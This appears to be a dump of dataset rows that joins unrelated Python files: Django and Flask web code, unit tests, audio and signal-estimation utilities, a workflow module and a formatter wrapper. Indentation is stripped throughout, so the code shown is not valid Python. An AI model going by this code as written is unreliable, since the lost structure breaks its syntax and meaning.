'on_grocery_list',
'photo',
'photo_hash',
'photo_large',
'photo_url',
'prep_time',
'scale',
'servings',
'source',
'source_url',
'total_time',
}
class Meta:
model = Recipe
exclude = ['id', 'import_stable_hash', 'created_date', 'modified_date', 'date_ended']
extra_kwargs = {
'in_trash': {'allow_null': True, 'default': False},
'paprika_account': {'write_only': True},
}
def validate_in_trash(self, value):
# None is allowed in serializer, but not in database, so convert it to the field's default
if value is None:
return Recipe._meta.get_field('in_trash').default
return value
def to_internal_value(self, data):
'Convert null fields to empty string as recommended for django db models'
for key, value in data.items():
if key in RecipeSerializer.NULL_TO_EMPTY_STR_FIELDS and value is None:
data[key] = ''
return super().to_internal_value(data)
def save(self, **kwargs):
instance = super().save(**kwargs)
# Download photo from signed url to disk
if instance and instance.photo_url:
instance.download_photo(use_db_url=True)
return instance
| StarcoderdataPython |
177226 | """test generate_bes_from_template"""
# pylint: disable=import-error,wildcard-import,undefined-variable,wrong-import-position,unused-wildcard-import,consider-using-f-string
import argparse
import os.path
import sys
# don't create bytecode for tests because it is cluttery in python2
sys.dont_write_bytecode = True
# check for --test_pip arg
parser = argparse.ArgumentParser()
parser.add_argument(
"--test_pip", help="to test package installed with pip", action="store_true"
)
args = parser.parse_args()
if not args.test_pip:
# add module folder to import paths for testing local src
sys.path.append(
os.path.join(os.path.dirname(os.path.dirname(os.path.abspath(__file__))), "src")
)
# reverse the order so we make sure to get the local src module
sys.path.reverse()
from generate_bes_from_template import *
tests_count = 0 # pylint: disable=invalid-name
# print(action_prefetch_from_template.__file__)
# make sure we are testing the right place:
if args.test_pip:
# this will false positive on windows
assert "/src/" not in action_prefetch_from_template.__file__
else:
# check for only 'src' so it will work on windows and non-windows
assert "src" in action_prefetch_from_template.__file__
def test_partials(partials_path="."):
"""test mustache template partials"""
print("test_partials()")
script_folder = os.path.dirname(os.path.abspath(__file__))
template_file_path = os.path.join(script_folder, "TemplateExample.mustache")
result = generate_bes_from_template.generate_content_from_template( # pylint: disable=unexpected-keyword-arg
{}, template_file_path, partials_path=partials_path
)
return result
# pylint: disable=line-too-long
assert str(action_prefetch_from_template.main()) == (
"prefetch LGPO.zip sha1:0c74dac83aed569607aaa6df152206c709eef769 size:815660 https://download.microsoft.com/download/8/5/C/85C25433-A1B0-4FFA-9429-7E023E7DA8D8/LGPO.zip sha256:6ffb6416366652993c992280e29faea3507b5b5aa661c33ba1af31f48acea9c4"
)
tests_count += 1
assert str(generate_bes_from_template.main()).startswith(
"""<?xml version="1.0" encoding="UTF-8"?>
<BES xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:noNamespaceSchemaLocation="BES.xsd">
<Task>
<Title>Example Generated From Template</Title>
<Description><![CDATA[ This Task was generated automatically! ]]></Description>
<Relevance><![CDATA[ Comment: Always False */ FALSE /* This example doesn't do anything, so it is always false. ]]></Relevance>
<Relevance><![CDATA[ TRUE ]]></Relevance>
<Category></Category>
<DownloadSize>9999</DownloadSize>
<Source>Internal</Source>
<SourceID><![CDATA[JGStew]]></SourceID>
"""
)
tests_count += 1
assert str(action_createfile_from_file.main()).startswith(
"""delete __createfile
// --- START of contents of action_createfile_from_file.py ------------
createfile until __END_OF_FILE__
#!/usr/local/python
"""
)
tests_count += 1
if not args.test_pip:
script_folder_path = os.path.dirname(os.path.abspath(__file__))
# print(test_partials(script_folder_path))
assert str(test_partials(script_folder_path)).startswith("Hello, World!")
tests_count += 1
assert str(test_partials(script_folder_path)).startswith(
"Hello, World! You can load partials from a folder!"
)
tests_count += 1
# tests pass, return 0:
print("-------------------------------------")
print("Success: %d Tests pass" % tests_count)
print("")
sys.exit(0)
| StarcoderdataPython |
5030092 | <reponame>Stoick01/bluebird
import unittest
import numpy as np
from bluebird.layers import *
from bluebird.nn import NeuralNet
from bluebird.activations import *
class TestMaxPool2D(unittest.TestCase):
def test_forward(self):
"""Test forward propagation for MaxPool2D"""
pool = MaxPool2D(kernel_size=3)
x = np.random.randn(5, 6, 9, 3)
a = pool.forward(x)
assert a.shape == (5, 2, 3, 3)
# def test_weight_grad(self):
# """Tests the input grad for MaxPool2D layer"""
# layer = MaxPool2D(kernel_size=3)
# x = np.random.randn(5, 6, 9, 3)
# diff = grad_calc(x, layer)
# print(diff)
# for key, val in diff.items():
# assert val < 1e-7, "Gradient of " + key + " not calculated properly" | StarcoderdataPython |
3477243 | """Super useful module"""
def print_num(number):
print(number)
| StarcoderdataPython |
1646122 | #!/usr/bin/env python
import csv
import sys
import os, os.path
import numpy as np
from datetime import datetime as dt
from scipy import optimize
from scripts import signals as sig
from scripts import fft_estimator
from scripts import optimizing
from scripts import utility
from scripts import crlb
from scripts import cfg
try:
task = sys.argv[1]
except Exception as e:
print("No input task provided, exiting. \n Usage: python main.py <task>")
exit(1)
SNR_dBs =[-10, 0, 10, 20, 30, 40, 50, 60]
FFT_Ks = [10, 12, 14, 16, 18, 20]
n = len(SNR_dBs)
m = len(FFT_Ks)
N = 100 # Amount of samples to generate when estimating variance
# Generate unique filename for data file output
run_number = len([name for name in os.listdir('./data') if os.path.isfile('./data/' + name)])
if task == 'a':
filename = 'data/part_a_run_' + str(run_number) + '_N_' + str(N) + '.csv'
with open(filename, 'ab') as file:
writer = csv.writer(file, delimiter=' ')
total_time_begin = dt.now()
for i in range(m):
K = FFT_Ks[i]
M = 2**K
for j in range(n):
SNR_dB = SNR_dBs[j]
w_estimates = np.zeros(N)
phi_estimates = np.zeros(N)
status_bar_progress = 0
run_time_begin = dt.now()
for k in range(N):
x_d = sig.x_discrete(SNR_dB)
omega_hat, phi_hat, _, _ = fft_estimator.estimator(x_d, M)
w_estimates[k] = omega_hat
phi_estimates[k] = phi_hat
status_bar_progress = utility.print_status_bar(k, status_bar_progress, N)
mean_f = np.mean(w_estimates) / (2*np.pi)
mean_phi = np.mean(phi_estimates)
var_f = np.var(w_estimates)
var_phi = np.var(phi_estimates)
crlb_f = crlb.omega(SNR_dB)
crlb_phi = crlb.phi(SNR_dB)
run_time_end = dt.now()
print("")
utility.print_execution_time(run_time_begin, run_time_end)
f_estimate_valid = True
phi_estimate_valid = True
if var_f < crlb_f:
f_estimate_valid = False
print("Variance for frequency lower than CRLB!")
if var_phi < crlb_phi:
phi_estimate_valid = False
print("Variance for phi lower than CRLB!")
writer.writerow([SNR_dB, K, crlb_f, var_f, f_estimate_valid, crlb_phi, var_phi, phi_estimate_valid, mean_f, mean_phi])
print("CONFIG | SNR [dB]: {}, M: 2^{}, true frequency: {}, true phase: {}".format(SNR_dB, K, cfg.f0, cfg.phi))
print("FREQUENCY | estimated mean: {}, estimated variance: {}, crlb: {}".format(mean_f, var_f, crlb_f))
print("PHASE | estimated mean: {}, estimated variance: {}, crlb: {}".format(mean_phi, var_phi, crlb_phi))
print("")
total_time_end = dt.now()
utility.print_execution_time(total_time_begin, total_time_end)
if task == 'b':
filename = 'data/part_b_run_' + str(run_number) + '_N_' + str(N) + '.csv'
with open(filename, 'ab') as file:
writer = csv.writer(file, delimiter=' ')
M = 2**10
total_time_begin = dt.now()
for SNR_dB in SNR_dBs:
w_estimates = np.zeros(N)
phi_estimates = np.zeros(N)
status_bar_progress = 0
run_time_begin = dt.now()
for i in range(N):
x_d = sig.x_discrete(SNR_dB)
omega_hat, phi_hat, _, _ = fft_estimator.estimator(x_d, M)
omega_opt = optimize.minimize(optimizing.frequency_objective_function, omega_hat, method="Nelder-Mead", args=(M, x_d, phi_hat))
phase_opt = optimize.minimize(optimizing.phase_objective_function, phi_hat, method="Nelder-Mead", args=(x_d, omega_hat))
w_estimates[i] = omega_opt.x[0]
phi_estimates[i] = phase_opt.x[0]
status_bar_progress = utility.print_status_bar(i, status_bar_progress, N)
run_time_end = dt.now()
print("")
utility.print_execution_time(run_time_begin, run_time_end)
mean_f = np.mean(w_estimates) / (2*np.pi)
mean_phi = np.mean(phi_estimates)
var_f = np.var(w_estimates)
var_phi = np.var(phi_estimates)
crlb_f = crlb.omega(SNR_dB)
crlb_phi = crlb.phi(SNR_dB)
f_estimate_valid = True
phi_estimate_valid = True
if var_f < crlb_f:
f_estimate_valid = False
print("Variance for f lower than CRLB!")
if var_phi < crlb_phi:
phi_estimate_valid = False
print("Variance for phi lower than CRLB!")
writer.writerow([SNR_dB, 10, crlb_f, var_f, f_estimate_valid, crlb_phi, var_phi, phi_estimate_valid, mean_f, mean_phi])
print("CONFIG | SNR [dB]: {}, M: 2^{}, true f: {}, true phase: {}".format(SNR_dB, 10, cfg.f0, cfg.phi))
print("FREQUENCY | estimated mean: {}, estimated variance: {}, crlb: {}".format(mean_f, var_f, crlb_f))
print("PHASE | estimated mean: {}, estimated variance: {}, crlb: {}".format(mean_phi, var_phi, crlb_phi))
print("")
total_time_end = dt.now()
utility.print_execution_time(total_time_begin, total_time_end) | StarcoderdataPython |
1852549 | # Copyright (c) 2017 <NAME>
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from __future__ import print_function
from collections import defaultdict
from functools import total_ordering
import numpy as np
from itertools import chain
from ..workflow.entities.bases import IntervalBase
from ..workflow.entities.threadins import ThreadActivity
from ..workflow.entities.join import JoinActivityBase
from ..workflow.entities.request import ExtendedInterval
def projection_time(from_tos):
from_tos.sort()
total = 0
start = None
end = None
for from_, to_ in from_tos:
if start is None:
start = from_
end = to_
elif from_ <= end:
end = max(end, to_)
else:
total += (end-start)
start = from_
end = to_
if start is not None:
total += (end-start)
return total
@total_ordering
class IntGroup(object):
def __init__(self, int_name, from_edgename, to_edgename, weight, desc):
self.int_name = int_name
self.from_edgename = from_edgename
self.to_edgename = to_edgename
self.vis_weight = weight
self.desc = desc
self.intervals = []
self._nxt_groups = set()
self._prv_groups = set()
self.links = None
self.linked = None
@property
def path(self):
return "%s[%s]%s" % (
self.from_edgename,
self.int_name,
self.to_edgename)
@property
def len_ints(self):
return len(self.intervals)
@property
def from_seconds(self):
if not self.intervals:
return 0
return min(c.from_seconds for c in self.intervals)
@property
def to_seconds(self):
if not self.intervals:
return 0
return max(c.to_seconds for c in self.intervals)
@property
def lapse(self):
return self.to_seconds - self.from_seconds
@property
def cumulated_seconds(self):
if not self.intervals:
return 0
return sum([c.lapse for c in self.intervals])
@property
def projection_seconds(self):
if not self.intervals:
return 0
from_tos = [(c.from_seconds, c.to_seconds) for c in self.intervals]
return projection_time(from_tos)
@property
def is_inlink(self):
if self.links or self.linked:
return True
else:
return False
def __repr__(self):
return "<IntGroup#%s: %d intervals, %d nxt_groups" % (
self.path,
len(self.intervals),
len(self._nxt_groups))
__eq__ = lambda self, other:\
id(self) == id(other)
__lt__ = lambda self, other:\
len(self.intervals) > len(other.intervals)\
and id(self) > id(other)
__hash__ = lambda self:\
id(self)
def append_interval(self, interval):
assert isinstance(interval, IntervalBase)
assert interval.path == self.path
self.intervals.append(interval)
def append_group(self, group):
assert isinstance(group, IntGroup)
assert group.from_edgename == self.to_edgename
self._nxt_groups.add(group)
group._prv_groups.add(self)
def prepare_sort(self):
assert not self.linked
if self.links:
prv_groups = chain(self._prv_groups, self.links._prv_groups)
nxt_groups = chain(self._nxt_groups, self.links._nxt_groups)
else:
prv_groups = self._prv_groups
nxt_groups = self._nxt_groups
self._topo_in = set()
for g in prv_groups:
if g.linked:
self._topo_in.add(g.linked)
else:
self._topo_in.add(g)
self._topo_out = set()
for g in nxt_groups:
if g.linked:
self._topo_out.add(g.linked)
else:
self._topo_out.add(g)
def try_merge(self, group):
assert isinstance(group, IntGroup)
assert not self.is_inlink
assert not group.is_inlink
assert self.path == group.path
self.links = group
group.linked = self
def abort_merge(self):
self.links.linked = None
self.links = None
def apply_merge(self):
assert self.links
self.intervals.extend(self.links.intervals)
for nxt_group in self.links._nxt_groups:
nxt_group._prv_groups.remove(self.links)
nxt_group._prv_groups.add(self)
for prv_group in self.links._prv_groups:
prv_group._nxt_groups.remove(self.links)
prv_group._nxt_groups.add(self)
self._nxt_groups.update(self.links._nxt_groups)
self._prv_groups.update(self.links._prv_groups)
self.links = None
def iter_nxtgroups(self):
for g in sorted(self._nxt_groups):
yield g
class Workflow(object):
def __init__(self, name):
self.name = name
self.start_group = None
self.groups = set()
self.len_intervals = 0
self.reqs = []
# for build
self._group_byreq = {}
# for reduce
self.paths = {}
@property
def len_reqs(self):
return len(self.reqs)
def build(self, intervals):
group_by_fromgroup_toedgename = {}
newgroup_byreq = {}
for interval in intervals:
if interval is None:
continue
assert isinstance(interval, IntervalBase)
assert interval.is_interval
assert interval.request
if not self._group_byreq:
if not self.start_group:
self.start_group = IntGroup("START",
None,
interval.from_edgename,
None,
"None")
from_group = self.start_group
else:
from_group = self._group_byreq[interval.request]
group_key = (from_group, interval.to_edgename)
group = group_by_fromgroup_toedgename.get(group_key)
if not group:
if isinstance(interval, ThreadActivity):
weight = interval.state.vis_weight
elif isinstance(interval, JoinActivityBase):
weight = interval.join_obj.vis_weight
elif isinstance(interval, ExtendedInterval):
weight = interval.component.vis_weight
else:
raise RuntimeError("Illegal interval %r" % interval)
desc = "%s: %s -> %s" % (
interval.path,
interval.from_keyword,
interval.to_keyword)
group = IntGroup(interval.int_name,
interval.from_edgename,
interval.to_edgename,
weight,
desc)
from_group.append_group(group)
group_by_fromgroup_toedgename[group_key] = group
self.groups.add(group)
self.paths[group.path] = group.vis_weight
group.append_interval(interval)
self.len_intervals += 1
newgroup_byreq[interval.request] = group
if not self.reqs:
self.reqs = newgroup_byreq.keys()
self._group_byreq = newgroup_byreq
# NOTE: Depth first
def sort_topologically(self):
ret = []
self.start_group.prepare_sort()
for group in self.groups:
group.prepare_sort()
def _walk(group):
for nxt_group in sorted(group._topo_out):
nxt_group._topo_in.remove(group)
if not nxt_group._topo_in:
ret.append(nxt_group)
_walk(nxt_group)
_walk(self.start_group)
if len(ret) == len(self.groups):
return ret
else:
return None
def reduce(self):
print("Workflow: built %d groups" % len(self.groups))
#1 sort states
path_weights = sorted(self.paths.items(),
key=lambda s:s[1],
reverse=True)
for path, _ in path_weights:
#2 sort groups of the same path
groups = self.sort_topologically()
assert groups
groups = [group for group in groups if group.path == path]
while groups:
group = groups[0]
groups = groups[1:]
nxt_groups = []
for to_merge in groups:
#3 try merge group pairs
group.try_merge(to_merge)
self.groups.remove(to_merge)
if self.sort_topologically() is not None:
group.apply_merge()
else:
group.abort_merge()
self.groups.add(to_merge)
nxt_groups.append(to_merge)
groups = nxt_groups
print("Workflow: reduced to %d groups" % len(self.groups))
def ready(self):
for group in self.groups:
assert not group.is_inlink
group.intervals.sort()
def __repr__(self):
return "<Workflow %s: %d groups, %d reqs, %d intervals>" % (
self.name,
len(self.groups),
len(self.reqs),
self.len_intervals)
def __str__(self):
ret = repr(self)
lines = []
attrs = []
for group in self.sort_topologically():
assert isinstance(group, IntGroup)
lines.append(group.path)
len_ints = group.len_ints
proj = group.projection_seconds
added = group.cumulated_seconds
lapse = group.lapse
avg = len_ints and added/len_ints
ratio = len_ints and proj/len_ints
attrs.append((len_ints, proj, added, lapse, avg, ratio, group.desc))
len_line = max(len(l) for l in lines)
ret += "\n"+" "*len_line + "| cnt,"+\
"project_s,cumulat_s, lapse_s, avg_MS, ratio_MS"
format_str = "\n%-" + str(len_line) + "s|" + "%6s,"\
+ "%9.5f,"*5 + " %s"
for line, (len_ints, proj, added, lapse, avg, ratio, desc)\
in zip(lines, attrs):
ret += format_str % (
line, len_ints, proj, added, lapse, avg*1000, ratio*1000, desc)
return ret
| StarcoderdataPython |
258583 | # coding=utf-8
if __name__ == "__main__":
print("developing...") | StarcoderdataPython |
1845 | <filename>egg/zoo/addition/data.py<gh_stars>1-10
# Copyright (c) Facebook, Inc. and its affiliates.
# This source code is licensed under the MIT license found in the
# LICENSE file in the root directory of this source tree.
from typing import Iterable, Optional, Tuple
import torch
from torch.utils.data import DataLoader
class ScaledDataset:
def __init__(self, examples, scaling_factor=1):
self.examples = examples
self.scaling_factor = scaling_factor
def __len__(self):
return len(self.examples) * self.scaling_factor
def __getitem__(self, k):
k = k % len(self.examples)
return self.examples[k]
def get_dataloaders(opts) -> Tuple[Iterable[
Tuple[torch.Tensor, torch.Tensor, Optional[torch.Tensor]]
], Iterable[
Tuple[torch.Tensor, torch.Tensor, Optional[torch.Tensor]]
]]:
"Returning an iterator for tuple(sender_input, labels, receiver_input)."
full_data = enumerate_dataset(opts.input_size)
len_train = int(opts.training_density * len(full_data))
train_set, holdout_set = torch.utils.data.random_split(full_data,
[len_train, len(full_data) - len_train]
)
validation_set = train_set
train_set = ScaledDataset(train_set, opts.data_scaler)
train_loader, validation_loader, holdout_loader = DataLoader(train_set, batch_size=opts.batch_size, shuffle=True), \
DataLoader(validation_set, batch_size=len(validation_set)), \
DataLoader(holdout_set, batch_size=opts.batch_size)
return train_loader, validation_loader, holdout_loader
def enumerate_dataset(input_size):
data = []
labels = []
for i in range(input_size):
for j in range(input_size):
inp = torch.zeros(2 * input_size)
inp[i] = 1.0
inp[input_size + j] = 1.0
label = torch.zeros(2 * input_size - 1)
label[i + j] = 1.0
data.append(inp)
labels.append(label)
data_tuples = [(data[i], labels[i]) for i in range(len(data))]
return data_tuples
| StarcoderdataPython |
195493 | import librosa
import numpy as np
import os
from librosa.display import specshow
import matplotlib.pyplot as plt
import IPython.display as ipd
from alcokit import HOP_LENGTH, SR, N_FFT
import pickle
def save_pickle(obj, path):
with open(path, "wb") as f:
f.write(pickle.dumps(obj))
return None
def load_pickle(path):
with open(path, "rb") as f:
obj = pickle.loads(f.read())
return obj
# OS
def is_audio_file(file):
return file.split(".")[-1] in ("wav", "aif", "aiff", "mp3", "m4a", "mp4") and "._" not in file
def flat_dir(directory, ext_filter=is_audio_file):
files = []
for root, dirname, filenames in os.walk(directory):
for f in filenames:
if ext_filter(f):
files += [os.path.join(root, f)]
return sorted(files)
def fs_dict(root, extension_filter=is_audio_file):
root_name = os.path.split(root.strip("/"))[-1]
items = [(d, list(filter(extension_filter, f))) for d, _, f in os.walk(root)]
if not items:
raise ValueError("no audio files found on path %s" % root)
return root_name, dict(item for item in items if len(item[1]) > 0)
# Conversion
normalize = librosa.util.normalize
a2db = lambda S: librosa.amplitude_to_db(abs(S), ref=S.max())
s2f = librosa.samples_to_frames
s2t = librosa.samples_to_time
f2s = librosa.frames_to_samples
f2t = librosa.frames_to_time
t2f = librosa.time_to_frames
t2s = librosa.time_to_samples
hz2m = librosa.hz_to_midi
m2hz = librosa.midi_to_hz
def m2b(m, sr=SR, n_fft=N_FFT):
step = (sr / 2) / (n_fft // 2)
return m2hz(m) / step
def b2m(b, sr=SR, n_fft=N_FFT):
step = (sr / 2) / (n_fft // 2)
return hz2m(b * step)
def delta_b(b, delta_m=1, sr=SR, n_fft=N_FFT):
"""
returns the size in bins of the interval delta_m (in midi) at bin `b`
"""
params = dict(sr=sr, n_fft=n_fft)
return b - m2b(b2m(b, **params) - delta_m, **params)
def unit_scale(x):
return (x - x.min()) / (x.max() - x.min())
# Debugging utils
def db(S):
if S.dtype == np.complex64:
S_hat = a2db(S.abs) + 40
elif S.min() >= 0 and S.dtype in (np.float, np.float32, np.float64, np.float_):
S_hat = a2db(S) + 40
else:
S_hat = a2db(S)
return S_hat
def signal(S, hop_length=HOP_LENGTH):
if S.dtype in (np.complex64, np.complex128):
return librosa.istft(S, hop_length=hop_length)
else:
return librosa.griffinlim(S, hop_length=hop_length, n_iter=32)
def audio(S, hop_length=HOP_LENGTH, sr=SR):
if len(S.shape) > 1:
y = signal(S, hop_length)
if y.size > 0:
return ipd.display(ipd.Audio(y, rate=sr))
else:
return ipd.display(ipd.Audio(np.zeros(hop_length*2), rate=sr))
else:
return ipd.display(ipd.Audio(S, rate=sr))
def playlist(iterable):
for seg in iterable:
audio(seg)
return
def playthrough(iterable, axis=1):
rv = np.concatenate(iterable, axis=axis)
return audio(rv)
def show(S, figsize=(), to_db=True, y_axis="linear", x_axis='frames', title=""):
S_hat = db(S) if to_db else S
if figsize:
plt.figure(figsize=figsize)
ax = specshow(S_hat, x_axis=x_axis, y_axis=y_axis, sr=SR)
plt.colorbar()
plt.tight_layout()
plt.title(title)
return ax
| StarcoderdataPython |
9649589 | import tornado.web
import tornado.gen
import json
import logging
from mickey.basehandler import BaseHandler
from mickey.groups import GroupMgrMgr
import mickey.redis
class OpenAttachKeepAliveHandler(BaseHandler):
@tornado.web.asynchronous
@tornado.gen.coroutine
def post(self):
data = json.loads(self.request.body.decode("utf-8"))
groupid = data.get("id", "")
device = data.get("device", "")
if not groupid:
logging.error("keep alive failed without groupid")
self.set_status(403)
self.finish()
return
if device:
kp_key = GroupMgrMgr.get_kpalive_key(device, self.p_userid, groupid)
mickey.redis.write_to_redis(kp_key, "OK", expire = 120)
GroupMgrMgr.keepalive_attacher(groupid, self.p_userid)
self.set_status(200)
self.finish()
| StarcoderdataPython |
319088 | <gh_stars>1-10
#!/usr/bin/env python
# -*- coding: utf-8 -*-
from flask.ext.wtf import Form
from flask.ext.pagedown.fields import PageDownField
from wtforms import StringField, SubmitField
from wtforms.validators import Required
class PostForm(Form):
head = StringField('What is your head',validators=[Required()])
body = PageDownField('What is your post body', validators=[Required()])
tag = StringField('What is post tag',validators=[Required()])
submit = SubmitField('Submit') | StarcoderdataPython |
1931146 | <reponame>Peking-Epoch/pyfmt
"""Main module."""
import os
def fmt(folder: str):
os.system(f"isort --recursive --force-single-line-imports --apply {folder}")
os.system(
f"autoflake --remove-all-unused-imports --recursive --remove-unused-variables --in-place {folder} --exclude=__init__.py"
)
os.system(f"black {folder}")
os.system(f"isort --recursive --apply {folder}")
| StarcoderdataPython |
3230179 | <gh_stars>0
from django.shortcuts import render
from django.http import HttpResponse
from rango.models import Category
def index(request):
category_list = Category.objects.order_by('-likes')[:5]
context_dict = {}
context_dict['boldmessage'] = 'Crunchy, creamy, cookie, candy, cupcake!'
context_dict['categories'] = category_list
# Render the response and send it back!
return render(request, 'rango/index.html', context=context_dict)
def about(request):
context_dict = {'boldmessage': 'This tutorial has been put together by <NAME>'}
return render(request, 'rango/about.html', context=context_dict)
def show_category(request, category_name_slug):
context_dict = {}
try:
category = Category.objects.get(slug=category_name_slug)
pages = Page.objects.filter(category=category)
context_dict['pages'] = pages
context_dict['category'] = category
except Category.DoesNotExist:
context_dict['pages'] = None
context_dict['category'] = None
return render(request, 'rango/category.html', context=context_dict) | StarcoderdataPython |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.